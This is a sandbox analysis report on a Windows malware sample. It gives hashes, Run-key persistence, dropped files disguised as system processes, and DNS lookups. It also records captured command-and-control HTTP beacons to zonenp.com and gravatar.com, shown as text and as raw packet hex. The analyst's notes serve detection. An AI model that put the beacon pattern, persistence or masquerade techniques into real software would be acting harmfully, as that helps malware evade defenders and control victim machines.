Analysis Date: 2014-09-02 19:19:04
MD5: 47946f267ddc94e9a0487e3bf8d92b33
SHA1: 99936554cb5d44d8c76aee2f1905d81fae5b4129

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text  md5: f804b85557da0042bac560aa40114c10 sha1: ec42dc2ea8a31047d8d9488689769de87e486ef9 size: 166912
Section .rdata md5: ae5280fc9541ee6566d704283276c159 sha1: f39d1f3d657223514dd56d63e1eaddb2808a354b size: 2048
Section .data  md5: be2d095eb694aa967102ff876e1b467e sha1: 9870edb02fbf44de9a462a5767717f9c04106d65 size: 15872
Section .tls   md5: 61645ea54bdc736772de33752424fa32 sha1: 9f8e7691f3674645afc27eb76058e1ac07d8f446 size: 512
Timestamp: 2005-09-08 13:42:38 (PE header compile time; this field is attacker-controlled and may not reflect the real build date)
Version: PrivateBuild: 1065
PEhash: 380cb2001f99f3b031e50b9fd760bb98bb5af8ed
IMPhash: 94c0f1072837483af5b03f0902433934

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
(Persistence: an HKLM Run value named "conhost" pointing at a copy in the user's Application Data folder. Legitimate conhost.exe lives in System32; a Run entry for it under a user profile path is a strong detection indicator.)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe start C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
(Note: the dropped binaries reuse Windows system process names — conhost.exe, dwm.exe, csrss.exe — but are written to user-writable locations (Application Data, Temp) rather than System32. Hunt for these names outside System32.)
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: gravatar.com
Winsock DNS: elworldonline.com
Winsock DNS: zonenp.com

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS gravatar.com
Type: A
192.0.80.241
DNS gravatar.com
Type: A
192.0.80.242
DNS gravatar.com
Type: A
192.0.80.239
DNS gravatar.com
Type: A
192.0.80.240
DNS zonenp.com
Type: A
202.124.241.178
DNS elworldonline.com
Type: A
(no answer recorded in the capture)
HTTP GET http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v85=75&tq=gJ4WK%2FSUh7TFlER8oY%2BQtMWTUj26kJH7yZVaK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
HTTP GET http://zonenp.com/blog/images/3521.jpg?v22=68&tq=gKZEtzyMv5rJqxG1J42pzMffBvQs0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
(Note: both requests carry the same `v<NN>=<NN>&tq=<base64-like blob>` query pattern and a lowercase, obsolete "mozilla/2.0" User-Agent — useful as a network signature. The gravatar.com request presumably uses a legitimate service as a beacon/cover channel; the `tq=` payload is not part of the Gravatar API — confirm by decoding.)
Flows TCP 192.168.1.1:1031 ➝ 192.0.80.241:80
Flows TCP 192.168.1.1:1032 ➝ 202.124.241.178:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626531 3f763835   bcfe64067be1?v85
0x00000040 (00064)   3d373526 74713d67 4a34574b 25324653   =75&tq=gJ4WK%2FS
0x00000050 (00080)   55683754 466c4552 386f5925 32425174   Uh7TFlER8oY%2BQt
0x00000060 (00096)   4d575455 6a32366b 4a483779 5a56614b   MWTUj26kJH7yZVaK
0x00000070 (00112)   25324225 32466278 57713153 666b4959   %2B%2FbxWq1SfkIY
0x00000080 (00128)   55424d20 48545450 2f312e30 0d0a436f   UBM HTTP/1.0..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a486f73 743a2067 72617661 7461722e   .Host: gravatar.
0x000000b0 (00176)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000d0 (00208)   7a696c6c 612f322e 300d0a0d 0a         zilla/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7632 323d3638   /3521.jpg?v22=68
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42765173   qxG1J42pzMffBvQs
0x00000040 (00064)   30656a62 77766753 39313758 3635724a   0ejbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   7a6f6e65 6e702e63 6f6d0d0a 41636365   zonenp.com..Acce
0x00000090 (00144)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x000000a0 (00160)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x000000b0 (00176)   0d0a0d0a 0a416363 6570743a 202a2f2a   .....Accept: */*
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000d0 (00208)   7a696c6c 612f322e 300d0a0d 0a         zilla/2.0....


Strings
..J...&|z.%^j.w.$ .
.".Y.
..
.jsU..N
u.N....&.
}9.@Y.....
.5J
...i-
.u..1....
R...
*..
0.%..>.
o.
.hM..........
.]
.zS..`N...
.
..CH
...
....
D.p}?..>+x....=.(
.
.P...]..qi..
..
040904b0
1065
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
068D2l
4<]5yE
4K\>|/0
7=?K^+
85oz9C
8N9Y[,
%>9<ky
a6XOV:
ABzXUv
b~{h2p
CallNextHookEx
ChildWindowFromPoint
|` CJVH
ClipCursor
COMCTL32.dll
comdlg32.dll
CompareStringW
CreateFiber
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
ED>d<j
EmptyClipboard
EnumResourceNamesA
e&q!$f
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
GWzB]S?<
hK[iI.
;HO(ZD
iCoboYm
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
}J.)Hh
Ji596t(
jmp}A-kF
JRichu
**J/vOg
+JxY4W
JXzvRAL
KERNEL32.dll
KFLEW&
k}*K+^5a
LD"2T7cp
@LK1sD
llL4ID
LocalAlloc
LockFile
N1pMPd
NdrClientCall
OKJWU>9h
,p(h3lB
`.rdata
RealGetWindowClass
RegisterClassW
R=fd|d
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
>S_~*l!k[
~s%\tl
TerminateProcess
!This program cannot be run in DOS mode.
ToAscii
=TTiZr
u9i?^=
UnhookWindowsHookEx
UnlockFile
USER32.dll
VerLanguageNameW
v(hJi}
v)v|UE
^; "_w
WinHelpW
wlt~;f
~w*(+p
wPfBi\in
?wZ	61
*|Xo]u3
].yjH[
}zK@*g5&